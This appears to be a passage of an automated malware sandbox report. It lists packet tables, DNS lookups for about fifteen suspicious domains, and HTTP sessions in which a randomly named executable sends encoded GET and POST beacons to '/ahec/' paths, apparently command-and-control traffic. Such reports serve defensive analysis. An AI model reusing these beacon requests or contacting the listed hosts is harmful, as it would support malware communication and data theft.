                                                                                                                                                            Dec 8, 2023 14:53:41.091448069 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091464996 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091473103 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091484070 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091502905 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091520071 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091522932 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091540098 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091542006 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091561079 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091576099 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091612101 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091634035 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091650009 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091700077 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.330385923 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330416918 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330440998 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330570936 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330627918 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330723047 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330837965 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.330918074 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330957890 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.330992937 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331064939 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331125975 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331196070 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331258059 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331290960 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331326008 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331394911 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331403971 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331461906 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331526995 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331538916 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331654072 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331723928 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331763983 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331847906 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.331912041 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.331923008 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.332000971 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.332017899 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.332206011 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.332706928 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.571451902 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:47.090408087 CET4979380192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:47.452197075 CET804979352.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:47.452327967 CET4979380192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:47.452611923 CET4979380192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:47.813079119 CET804979352.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:47.872071981 CET804979352.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:47.872112989 CET804979352.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:47.872175932 CET4979380192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:48.966269016 CET4979380192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:49.983134985 CET4979480192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:50.336334944 CET804979452.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:50.336447001 CET4979480192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:50.336647034 CET4979480192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:50.688925028 CET804979452.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:50.694278002 CET804979452.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:50.694299936 CET804979452.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:50.694417000 CET4979480192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:52.063811064 CET4979480192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:53.075890064 CET4979580192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:53.436857939 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.436959028 CET4979580192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:53.437545061 CET4979580192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:53.798527956 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798557043 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798568964 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798578978 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798593044 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798675060 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.798882961 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.799247980 CET804979552.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:53.799305916 CET4979580192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:54.950548887 CET4979580192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:55.966648102 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:56.981883049 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:57.335335016 CET804979652.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:57.335414886 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:57.335622072 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:57.687861919 CET804979652.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:57.689404964 CET804979652.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:57.689436913 CET804979652.220.48.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:57.689681053 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:57.690093994 CET4979680192.168.2.452.220.48.161
                                                                                                                                                            Dec 8, 2023 14:53:58.042496920 CET804979652.220.48.161192.168.2.4

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 8, 2023 14:50:18.623605013 CET5940253192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:50:18.930447102 CET53594021.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:34.471115112 CET6295853192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:50:34.662729979 CET53629581.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.077996969 CET6334353192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:50:48.312882900 CET53633431.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:01.703404903 CET5496153192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:51:02.287717104 CET53549611.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:17.687038898 CET5352853192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:51:18.140363932 CET53535281.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:32.436403036 CET5125053192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:51:32.805896044 CET53512501.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:47.453363895 CET5977053192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:51:47.707806110 CET53597701.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:02.311144114 CET5753053192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:52:03.311804056 CET5753053192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:52:03.533700943 CET53575301.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.533730030 CET53575301.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:16.967672110 CET6292753192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:52:17.352397919 CET53629271.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:31.217304945 CET5559553192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:52:31.938296080 CET53555951.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:45.904962063 CET6313653192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:52:46.217083931 CET53631361.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:00.560827971 CET5455753192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:53:01.268340111 CET53545571.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:16.389132023 CET5020153192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:53:17.388792992 CET5020153192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:53:18.187762976 CET53502011.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.187824011 CET53502011.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:31.623687983 CET5526353192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:53:32.080784082 CET53552631.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:46.342107058 CET5424953192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET53542491.1.1.1192.168.2.4

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Dec 8, 2023 14:50:18.623605013 CET192.168.2.41.1.1.10xf42cStandard query (0)www.alldaysslimmingstea.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:34.471115112 CET192.168.2.41.1.1.10x2f57Standard query (0)www.user4deepriver.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:48.077996969 CET192.168.2.41.1.1.10x4ff6Standard query (0)www.poria.linkA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:01.703404903 CET192.168.2.41.1.1.10x61d6Standard query (0)www.makeinai.onlineA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:17.687038898 CET192.168.2.41.1.1.10x3336Standard query (0)www.instantconvey.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:32.436403036 CET192.168.2.41.1.1.10x45eaStandard query (0)www.domainappraisalbot.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:47.453363895 CET192.168.2.41.1.1.10xab8aStandard query (0)www.nesmalt.infoA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:02.311144114 CET192.168.2.41.1.1.10xfe36Standard query (0)www.611erhm.topA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:03.311804056 CET192.168.2.41.1.1.10xfe36Standard query (0)www.611erhm.topA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:16.967672110 CET192.168.2.41.1.1.10x33ceStandard query (0)www.fam-scharf.netA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:31.217304945 CET192.168.2.41.1.1.10x17c2Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:45.904962063 CET192.168.2.41.1.1.10xce3bStandard query (0)www.thecoloringbitch.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:00.560827971 CET192.168.2.41.1.1.10xcadcStandard query (0)www.altralogos.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:16.389132023 CET192.168.2.41.1.1.10x6bd5Standard query (0)www.77moea.topA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:17.388792992 CET192.168.2.41.1.1.10x6bd5Standard query (0)www.77moea.topA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:31.623687983 CET192.168.2.41.1.1.10xc75dStandard query (0)www.wrautomotive.onlineA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:46.342107058 CET192.168.2.41.1.1.10x7db7Standard query (0)www.npstore.asiaA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Dec 8, 2023 14:50:18.930447102 CET1.1.1.1192.168.2.40xf42cNo error (0)www.alldaysslimmingstea.comalldaysslimmingstea.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:18.930447102 CET1.1.1.1192.168.2.40xf42cNo error (0)alldaysslimmingstea.com162.222.226.77A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:34.662729979 CET1.1.1.1192.168.2.40x2f57No error (0)www.user4deepriver.com74.208.236.181A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:48.312882900 CET1.1.1.1192.168.2.40x4ff6No error (0)www.poria.link104.21.18.253A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:50:48.312882900 CET1.1.1.1192.168.2.40x4ff6No error (0)www.poria.link172.67.184.73A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:02.287717104 CET1.1.1.1192.168.2.40x61d6No error (0)www.makeinai.online37.140.192.89A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:18.140363932 CET1.1.1.1192.168.2.40x3336No error (0)www.instantconvey.cominstantconvey.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:18.140363932 CET1.1.1.1192.168.2.40x3336No error (0)instantconvey.com131.153.147.90A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:32.805896044 CET1.1.1.1192.168.2.40x45eaNo error (0)www.domainappraisalbot.com94.23.162.163A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:51:47.707806110 CET1.1.1.1192.168.2.40xab8aNo error (0)www.nesmalt.info66.29.155.54A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:03.533700943 CET1.1.1.1192.168.2.40xfe36No error (0)www.611erhm.top34.117.26.57A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:03.533700943 CET1.1.1.1192.168.2.40xfe36No error (0)www.611erhm.top34.149.198.43A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:03.533730030 CET1.1.1.1192.168.2.40xfe36No error (0)www.611erhm.top34.117.26.57A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:03.533730030 CET1.1.1.1192.168.2.40xfe36No error (0)www.611erhm.top34.149.198.43A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:17.352397919 CET1.1.1.1192.168.2.40x33ceNo error (0)www.fam-scharf.netfam-scharf.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:17.352397919 CET1.1.1.1192.168.2.40x33ceNo error (0)fam-scharf.net81.169.145.70A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:31.938296080 CET1.1.1.1192.168.2.40x17c2No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:31.938296080 CET1.1.1.1192.168.2.40x17c2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:31.938296080 CET1.1.1.1192.168.2.40x17c2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:46.217083931 CET1.1.1.1192.168.2.40xce3bNo error (0)www.thecoloringbitch.comthecoloringbitch.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:52:46.217083931 CET1.1.1.1192.168.2.40xce3bNo error (0)thecoloringbitch.com162.241.252.161A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:01.268340111 CET1.1.1.1192.168.2.40xcadcNo error (0)www.altralogos.comaltralogos.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:01.268340111 CET1.1.1.1192.168.2.40xcadcNo error (0)altralogos.com185.74.252.11A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:18.187762976 CET1.1.1.1192.168.2.40x6bd5No error (0)www.77moea.top107.178.250.177A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:18.187762976 CET1.1.1.1192.168.2.40x6bd5No error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:18.187824011 CET1.1.1.1192.168.2.40x6bd5No error (0)www.77moea.top107.178.250.177A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:18.187824011 CET1.1.1.1192.168.2.40x6bd5No error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:32.080784082 CET1.1.1.1192.168.2.40xc75dNo error (0)www.wrautomotive.onlinewrautomotive.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:32.080784082 CET1.1.1.1192.168.2.40xc75dNo error (0)wrautomotive.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)www.npstore.asiadns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com52.220.48.161A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com13.213.230.75A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com52.77.138.116A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • www.alldaysslimmingstea.com
                                                                                                                                                            • www.user4deepriver.com
                                                                                                                                                            • www.poria.link
                                                                                                                                                            • www.makeinai.online
                                                                                                                                                            • www.instantconvey.com
                                                                                                                                                            • www.domainappraisalbot.com
                                                                                                                                                            • www.nesmalt.info
                                                                                                                                                            • www.611erhm.top
                                                                                                                                                            • www.fam-scharf.net
                                                                                                                                                            • www.magmadokum.com
                                                                                                                                                            • www.thecoloringbitch.com
                                                                                                                                                            • www.altralogos.com
                                                                                                                                                            • www.77moea.top
                                                                                                                                                            • www.wrautomotive.online
                                                                                                                                                            • www.npstore.asia

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449739162.222.226.77805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:19.134288073 CET480OUTGET /ahec/?XveXHZvx=0lWeLq0ljZnDSWqNACJ6NPdmpHmas/FJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyVl134IW6OhHwJLQ==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.alldaysslimmingstea.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:50:19.337153912 CET844INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:19 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 583
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.44974074.208.236.181805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:34.831656933 CET759OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 74 6e 69 39 75 43 55 44 70 48 30 6e 48 43 78 44 43 77 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIytni9uCUDpH0nHCxDCw==
                                                                                                                                                            Dec 8, 2023 14:50:35.005354881 CET580INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:34 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip
